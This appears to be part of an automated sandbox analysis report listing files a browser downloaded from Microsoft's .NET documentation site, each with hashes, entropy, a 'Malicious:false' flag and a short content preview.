                                                                                                                                                                                                                      SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
                                                                                                                                                                                                                      Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1817143
                                                                                                                                                                                                                      Entropy (8bit):5.501007973622959
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                                      MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                                      SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                                      SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                                      SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1432
                                                                                                                                                                                                                      Entropy (8bit):4.986131881931089
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                                      MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                                      SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                                      SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                                      SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1154
                                                                                                                                                                                                                      Entropy (8bit):4.59126408969148
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                                      MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                                      SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                                      SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                                      SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                                      Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):19696
                                                                                                                                                                                                                      Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                                      MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                                      SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                                      SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                                      SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                                                      Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):33148
                                                                                                                                                                                                                      Entropy (8bit):4.917595394577667
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                                      MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                                      SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                                      SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                                      SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                                      Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35005
                                                                                                                                                                                                                      Entropy (8bit):7.980061050467981
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                                      MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                                      SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                                      SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                                      SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13842
                                                                                                                                                                                                                      Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                      MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                      SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                      SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                      SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4897
                                                                                                                                                                                                                      Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                                      MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                                      SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                                      SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                                      SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):47062
                                                                                                                                                                                                                      Entropy (8bit):5.016115705165622
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                                      MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                                                      SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                                                      SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                                                      SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):3130
                                                                                                                                                                                                                      Entropy (8bit):4.790069981348324
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                                      MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                                      SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                                      SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                                      SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                                      Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):18367
                                                                                                                                                                                                                      Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                                      MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                                      SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                                      SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                                      SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13339
                                                                                                                                                                                                                      Entropy (8bit):7.683569563478597
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                                      MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                                      SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                                      SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                                      SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):18367
                                                                                                                                                                                                                      Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                                      MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                                      SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                                      SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                                      SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
